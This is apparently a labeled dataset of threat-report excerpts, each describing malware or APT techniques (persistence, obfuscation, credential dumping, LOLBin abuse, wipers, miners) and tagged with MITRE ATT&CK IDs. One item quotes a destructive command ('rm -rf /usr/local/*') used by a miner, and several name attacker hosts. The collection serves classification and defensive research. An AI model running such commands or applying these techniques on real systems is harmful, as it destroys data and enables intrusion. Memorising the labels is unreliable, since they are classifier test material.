{"text1":"Persistence with BITS UBoatRAT achieves persistence by using Microsoft Windows Background Intelligent Transfer Service(BITS). BITS is a service for transferring files between machines. Though the most famous application using the service is Windows Update, other applications or users can take advantage of the component. The tool provides the option, \/SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot. After completing the copying the local file, BITS executes the UBoatRAT file configured with \/SetNotifyCmdLine at the third line","labels":"['T1197']"}
{"text1":"It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the \/Library\/LaunchDaemons\/ folder (Scheduled Task\/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004","labels":"['T1543.004']"}
{"text1":"The group extensively uses long-running strategic web compromises[2] (SWCs), and relies on whitelists to deliver payloads to select victims. In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger","labels":"['T1189']"}
{"text1":"Both variants of the BitPaymer malware feature multiple techniques to hinder analysis. The malware developers have employed a combination of encrypted strings, string hashes and dynamic API resolution to ensure that no strings exist in the binary","labels":"['T1106']"}
{"text1":"Ramsay implements a decentralized way of storing these artifacts among the victim\u2019s file system by using inline hooks applied on two Windows API functions, WriteFile and CloseHandle","labels":"['T1106']"}
{"text1":"The VBScript also uploads the output of the provided batch scripts to the command and control (C2) server, which provides threat actors a functional remote shell to the system","labels":"['T1119']"}
{"text1":"The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers. Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack \u2013 after the victim becomes aware of it. This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted","labels":"['T1070.004']"}
{"text1":"It uses virtualization software \u2013 QEMU on macOS and VirtualBox on Windows \u2013 to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner. 2) Shell scripts used to launch the QEMU images. qemuservice shell script . After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed: - qemuservice won\u2019t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by. Before installation, version 1 of the miner is removed along with executing the command: rm -rf \/usr\/local\/* . As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process. Launching the Linux image . All versions use multiple shell scripts to launch the images. Version 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service. All versions use the following switches: - -M accel=hvf to use the Hypervisor framework as an accelerator. There are, however, some hints that can help you to identify when an application contains unwanted code: - A trust popup from an unexpected, \u201cadditional\u201d installer (in this case the Oracle network adapter). - High CPU consumption by a process you did not install (QEMU or VirtualBox in this case). - A new service added to the startup services list (Windows) or a new Launch Daemon (macOS). - Network connections to curious domain names (such as system-update[.]info or system-check[.]services here). Indicators of Compromise (IoCs) . Hashes . macOS \u201ccracked\u201d applications (versions 1-3) . Windows \u201ccracked\u201d applications (version 4) . Linux images . Filenames . macOS . Windows . Hostnames . Download hosts (via HTTP on port 80) . Update hosts (via SCP) . Mining hosts . MITRE ATT&CK techniques . 20 Jun 2019 - 11:00AM . Sign up to receive an email update whenever a new article is published in our Ukraine Crisis \u2013 Digital Security Resource Center . Newsletter . Similar Articles . ESET Research . Watering hole deploys new macOS malware, DazzleSpy, in Asia . Virus Bulletin: Old malware never dies \u2013 it just gets more targeted . Anatomy of native IIS malware . Some URL shortener services distribute Android malware, including banking or SMS trojans . Discussion","labels":"['T1569.001']"}
{"text1":"Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. This campaign relies on the abuse of Blogspot to host attacker-operated blogs serving malicious VB based scripts to their targets. We've found preliminary malicious components from initial access beacons to file exfiltrators being deployed to victims. In many cases, the content of these preliminary components was combined to serve special scripts to victims.The final implants utilized by the actors in this campaign are derivatives of the Gold Dragon\/Brave Prince malware families. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations","labels":"['T1608.001']"}
{"text1":"If the user opens the file and the exploitation is successful, a backdoor Trojan is installed on the system that gives the attacker access and a decoy document is displayed to the victim. The main module is also responsible for communicating with its C2 servers and handling commands issued by the C2 server. Figure 8: FakeM Architecture . All FakeM variants initiate communications with its C2 server and check the C2\u2019s response for a command. After sending the acknowledgement packet, the Trojan will gather local system information and include it in a beacon to the C2 server. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4. Unit 42 tracks this mobile Trojan as MobileOrder, as the authors specifically refer to commands within the app as orders. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. The C2 server will respond to requests from MobileOrder with commands that the Trojan refers to as \u201corders\u201d. MobileOrder contains a command handler with functionality that provides a fairly robust set of commands, as seen in Table 6. Table 6: MobileOrder command handler . Infrastructure Overlap and Related Tools . There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants, as well other Trojans such as MobileOrder, Psylo, and CallMe. Actors will run HTRAN on a server and configure their malware to interact with that server; however, the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists","labels":"['T1083']"}
{"text1":"So far, our telemetry hasn\u2019t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it\u2019s worth mentioning that for one victim we found a correlation between the execution of Remexi\u00b4s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload","labels":"['T1059.005']"}
{"text1":"Second technique: FIN6 also leveraged the creation of Windows services (named with a random 16-character string such as IXiCDtPbtGWnrAGQ) to execute encoded PowerShell commands. The randomly named service is a by-product of using Metasploit, which creates the 16-character service by default. The encoded command contained a Metasploit reverse HTTP shellcode payload stored in a byte-array like the first technique. This C2 URL contained shellcode that would make an HTTPS request for an additional download","labels":"['T1059.001']"}
{"text1":"PowerShell Cobalt Strike Beacon -\u00a0New payload + new C2 domain - PowerShell Obfuscator -\u00a0All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper -\u00a0A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper -\u00a0Inspired by known Outlook credentials dumpers","labels":"['T1552.002']"}
{"text1":"During the first C&C call, the backdoor sends a pack with the victim\u2019s system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware","labels":"['T1012', 'T1560']"}
{"text1":"Each payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address. So far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success. We\u2019ve seen mining payloads compiled as early as December 2019 and as recently as late April 2020. In each compilation, one of the two wallets has been embedded into the binary. The wallet addresses could be extracted from the binaries easily in earlier versions using a simple strings command. In newer versions, the string is obfuscated","labels":"['T1027']"}
{"text1":"Certutil is a living-off the land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors usually utilize certutil to download remote files from a given URL. It also incorporates a built-in function to decode base64-encoded files","labels":"['T1140']"}
{"text1":"In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject \u201c\u041f\u0430\u043c\u044f\u0442\u043a\u0430 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u201d (Information Security Notice) and contained a Microsoft Word attachment named \u201c\u0441\u0432\u043e\u0434\u043a\u04301705.doc\u201d (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line \u201c\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u201d (security) and a Microsoft Word attachment (Figure 4) \u201c\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.doc\u201d (Safety requirements","labels":"['T1566.001']"}
{"text1":"Web inject \u2013 the configuration file for the hooking module Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim\u2019s traffic by injecting the module into the browser\u2019s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page","labels":"['T1185', 'T1059.007']"}
{"text1":"My blog post, \u201cRemote Mac Exploitation Via Custom URL Schemes\u201d, describes the technical details of how WindShift (ab)used custom URL schemes to infect macOS systems","labels":"['T1189']"}
{"text1":"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The dropped files are now stored in a folder located in C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\ always following the same pattern similar to the following: 4CA-B25C11-A27BC. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp. Mysterious Wintask.xml . Our initial analysis in a sandbox showed that the C2 contact module attempts to execute this file, searching for it in the same path as the document search module, which we further corroborated with manual analysis. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network","labels":"['T1204.002']"}
{"text1":"One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. With a successful connection, it will send the word \"almond\" The server should reply either with \"who\" or \"ice. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are","labels":"['T1033']"}
{"text1":"APT15 then used a tool known as RemoteExec (similar to Microsoft\u2019s Psexec) in order to remotely execute batch scripts and binaries","labels":"['T1569.002']"}
{"text1":"At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign","labels":"['T1218.011']"}
{"text1":"After the exploit succeeds, this Fallout Exploit Kit downloads a \u201c.tmp\u201d file to the %Temp% directory and calls CreateProcess to execute it. Further analysis revealed that the \u201c.tmp\u201d file was the latest variant of Azorult malware. It was the first time we\u2019ve seen the new variant of Azorult malware used as primary payload for Fallout Exploit Kit","labels":"['T1105']"}
{"text1":"In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form (T1059.001: PowerShell","labels":"['T1059.001']"}
{"text1":"When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the specified directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set","labels":"['T1027.004', 'T1012', 'T1083']"}
{"text1":"A custom executable that only contains the Metasploit shellcode. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8","labels":"['T1547.001']"}
{"text1":"It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. Persistence is maintained through a Run registry key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past","labels":"['T1574.001']"}
{"text1":"The ransomware also stops security software-related processes to evade detection and termination of its malicious activities","labels":"['T1518.001', 'T1562.001']"}
{"text1":"Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings","labels":"['T1218.005']"}
{"text1":"APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection","labels":"['T1553.002']"}
{"text1":"Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are\u00a0stored in randomly named .dat files within the Skype folder","labels":"['T1123', 'T1125']"}
{"text1":"During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command","labels":"['T1204.002']"}
{"text1":"The attackers used the famous Mimikatz credential dumping tool as their main tool to obtain credentials including user passwords, NTLM hashes and Kerberos tickets. Mimikatz is a very popular tool and is detected by most antivirus vendors and other security products. Therefore, the attackers used over 10 different customized Mimikatz payloads, which were obfuscated and packed in a way that allowed them to evade antivirus detection","labels":"['T1588.002']"}
{"text1":"Editor\u2019s note: Following publication of this blog, it came to our attention that AhnLab encountered what appears to be an earlier version of SDBbot, described in their recent Q3 ASEC Report as a \u201cmalicious SDB file. AhnLab describes delivery of the malware in South Korean campaigns as a secondary payload to the FlawedAmmyy RAT. TA505 has been active in South Korea in 2019 and frequently distributes the FlawedAmmyy RAT, but we cannot verify the connection at this time","labels":"['T1204.002']"}
{"text1":"This DLL is used for decrypting and executing another JavaScript backdoor such as Orz. The DLL is registered by the installer using regsvr32. If the string \u201cDR\u201d is passed as an argument, or if the DLL is running in the active session with a username that is not \u201csystem\u201d, the final JavaScript backdoor is decoded using a custom base64 alphabet. This backdoor has to be present in the same directory as the dll, with a \u201c.tmp\u201d file extension. The backdoor script is then executed using the IActiveScript and IActiveScriptParse32 COM interfaces","labels":"['T1140']"}
{"text1":"The \u2018vac.dll\u2019 DLL file is signed with a valid, legitimate digital signature, although the file has been tampered with. At first glance, the fact that its digital signature is valid would suggest the file has not been manipulated after being digitally signed","labels":"['T1553.002']"}
{"text1":"Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring","labels":"['T1053.005']"}
{"text1":"CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs. The threat actors steal data from compromised systems over a long period of time, which likely indicates a long-term objective of monitoring the target's network. BRONZE PRESIDENT uses custom batch scripts to collect either specific file types (including files with .pptx, .xlsx, .pdf extensions) or all files within a specific location. CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts, such as social media and webmail accounts","labels":"['T1119']"}
{"text1":"The malware calls User32.dll's GetKeyboardLayoutList function, inspects the keyboard identifier, and returns true if the result ends in a value between \\x18 thru \\x44 inclusive. This result means the compromised host is whitelisted based on the host's configured keyboard layout. The malware inspects only the lower byte of the full keyboard identifier, so all systems using the keyboard locales listed in Table 4 are immune to REvil. Despite the large number of potential matches, CTU researchers suspect that the malware author intended to identify Russian keyboards based on several other links to the Russia-based GandCrab ransomware","labels":"['T1082']"}
{"text1":"The malware checks the language of the machine with function \u201cGetUserDefaultUILanguage\u201d and saves the value in the stack; it is not checked automatically after the call, but it is important later","labels":"['T1614.001']"}
{"text1":"Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers","labels":"['T1057', 'T1518.001']"}
{"text1":"In the obfuscated and packed version of the loader, an uncommon API call is used to facilitate code injection. As seen in the image below, the loader uses VirtualAllocExNuma to allocate new memory and store the returned base address. The beginning of an obfuscated shellcode is copied to this address after being decrypted using an RC4 algorithm.In addition to the shellcode an additional PE can be seen in memory","labels":"['T1106']"}
{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what","labels":"['T1053.005']"}
{"text1":"After executing the sample, we noticed the sample copied itself to a hidden folder and launched from the hidden folder. This is a good first step to hide itself from casual observation on disk","labels":"['T1564.001']"}
{"text1":"Qakbot has anti-analysis and anti-virtual machine checks. It will not continue to execute if any of the following exists in the system","labels":"['T1497.001']"}
{"text1":"Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL\/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message","labels":"['T1110.001']"}
{"text1":"BITSAdmin tool - Win32 apps BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. Using BITS - Win32 apps Using BITS - bitsadmin examples Examples showing how to use the bitsadmin tool to perform the most common tasks. Background Intelligent Transfer Service - Win32 apps Background Intelligent Transfer Service (BITS) transfers files (downloads or uploads) between a client and server and provides progress information related to the transfers. cleanmgr Configure the Disk Cleanup tool (Cleanmgr.exe) to automatically clean up certain files. bitsadmin Reference article for the bitsadmin command, which is a command-line tool used to create, download, or upload jobs and monitor their progress","labels":"['T1570']"}
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine","labels":"['T1053.005']"}
{"text1":"After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command","labels":"['T1490']"}
{"text1":"The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9","labels":"['T1059']"}
{"text1":"Steals Google Chrome and Apple Safari browser cookies from the victim\u2019s machine - Steals saved usernames and passwords in Chrome - Steals saved credit card credentials in Chrome - Steals iPhone\u2019s text messages if backed up to Mac - Steals cryptocurrency wallet data and keys - Keeps full control of the victim using the EmPyre backdoor - Mines cryptocurrency on the victim\u2019s machine","labels":"['T1555.003']"}
{"text1":"Look for traffic to any of the related malicious domains identified in Appendix A. Use the signatures provided by FireEye to identify related activity. Make sure all credentials in an organization, including service accounts, are reset following a breach and that default passwords or those similar to previous passwords are not used. If you run an on-premise Exchange environment, consider adding alerting mechanisms to any EDR solutions for processes using the Exchange Management Shell PowerShell cmdlets listed in Appendix B. This may or may not be a valid detection approach depending on how frequently this is used within your organization. More generally, if the Exchange Management Shell is rarely used in a legitimate Administrative context, it may be worth investigating any historical use of this shell","labels":"['T1482']"}
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh. Based on the config file it uses, it appears to be the Monero Silent Miner. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure","labels":"['T1059.004']"}
{"text1":"It uses the\u00a0Windows service \u201cwinmgmts:\\\\.\\root\\SecurityCenter2 \u201d to check all AntiVirus products installed on the operating system. As shown below in the figure, it is done by creating the object the service \u201c winmgmts:\\\\.\\root\\SecurityCenter2 \u201d and executes the query \u201c Select * From\u00a0AntiVirusProduct \u201d by using the same object that is created of a mentioned service","labels":"['T1518.001']"}
{"text1":"Flagpro v2.0 has another new function. If a dialog title is \u201cInternet Explorer [7-11]\u201d (the number after \u201cInternet Explorer\u201d depends on what version the user users) when Flagpro accesses to an external site, Flagpro sends WM_CLOSE message to close the dialog","labels":"['T1070']"}
{"text1":"The file destruction algorithm is composed of two stages: a first stage to overwrite files and another to destroy the physical disk layout and the partition tables along with it. For the file destruction, it takes ownership of the files by modifying their ACL entries after it has obtained the 'SeTakeOwnershipPrivilege'. A file found will then simply be overwritten with zeros. This is done for the next 23 drives alphabetically (through \"Z:\\\"). On the second stage, the wiper attempts to set the drive layout of all the physical drives on the system numbered 9 to 0. This will wipe out all extended information about the physical drive's partitions including MBR, GPT and partition entries. Destroying the start of the files and the partitions tables is a common technique seen on other wipers, and its highly effective in preventing the file recovery","labels":"['T1561.002']"}
{"text1":"BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication","labels":"['T1133']"}
{"text1":"This second request (Encoded Get System Information Request) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers, which uses a four-byte XOR encoding. Before acting on the request, Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking","labels":"['T1573.001', 'T1205']"}
{"text1":"an executable (also compressed, i.e. zip, rar or cab archive), sometimes pretending to be a different file format, like Dyreza - a document (commonly\u00a0PDF or\u00a0some MS Office format ) \u2013 like this Dridex downloader","labels":"['T1204.002']"}
{"text1":"After \u201cGetExtendedTcpTable\u201d is executed and the process returns back to the second part of the code, it iteratively checks every record in the returned Tcp table. If any record contains the PID Waterbear wants to hide, it will remove the corresponding record, modify the record number inside the table, and continue to check the succeeding records","labels":"['T1562.006']"}
{"text1":"The function will then download an encrypted file containing the final payload used in the campaign. The file is encrypted with a custom XOR-based algorithm, with the key 0x0AE2. In the latest versions, the authors moved from encryption to using a base64-encoded ZIP file","labels":"['T1027']"}
{"text1":"When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix \u2018tmp\u2019 followed by random digits. The batch file content","labels":"['T1070.004']"}
{"text1":"We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft","labels":"['T1027']"}
{"text1":"As we mentioned, the Bad Rabbit ransomware encrypts a victim\u2019s files and disk. Files are encrypted with the following algorithms","labels":"['T1486']"}
{"text1":"If opened, the dropper runs a loader known as Trojan.Vcrodat on the computer. Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor\u2019s component may be run with elevated privileges","labels":"['T1574.001']"}
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1059.003']"}
{"text1":"2) The directory \u201cout\u201d is created in the user\u2019s %AppData% folder. 5) The screenshot is then copied over to the newly created \u201cout\u201d directory of the system where the batch script was executed. 6) In one instance, DHS observed an \u201cout.zip\u201d file created","labels":"['T1074.001']"}
{"text1":"Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. Further, CARBON SPIDER frequently conducted hypervisor jackpotting by encrypting ESXi servers using a version of Darkside specifically designed for ESXi","labels":"['T1486']"}
{"text1":"MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. Once installed, the malware checks for the existence of two files: keyword_parm.txt and parm.txt and attempts to read the configuration files every 30 seconds","labels":"['T1070.004']"}
{"text1":"OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents","labels":"['T1027.002']"}
{"text1":"The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows","labels":"['T1140']"}
{"text1":"Cobalt Strike. Use scheduled tasks and batch files for automation. The use of LOLBins. Erasing Windows Event Logs, files and tasks","labels":"['T1053.005']"}
{"text1":"In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server. The primary contents of the MSI package were","labels":"['T1218.007']"}
{"text1":"Then, it modifies the Team Viewer registry settings. As we said, the Team Viewer components used in this campaign are not the original ones. They are slightly modified. The malware author replaced all the entries of \u201cTeamviewer\u201d strings in Team Viewer components. TeamViewer client registry settings are then HKLMSoftwareGoldstagerVersion5 and HKLMSoftwareCoinstagerVersion5 correspondingly. The launcher sets up several registry values that control how the remote access tool will work. This parameter represents a hash of the password with which a remote user has to connect to Team Viewer client. After that, the starter executes the very Team Viewer client netsvcs.exe","labels":"['T1219']"}
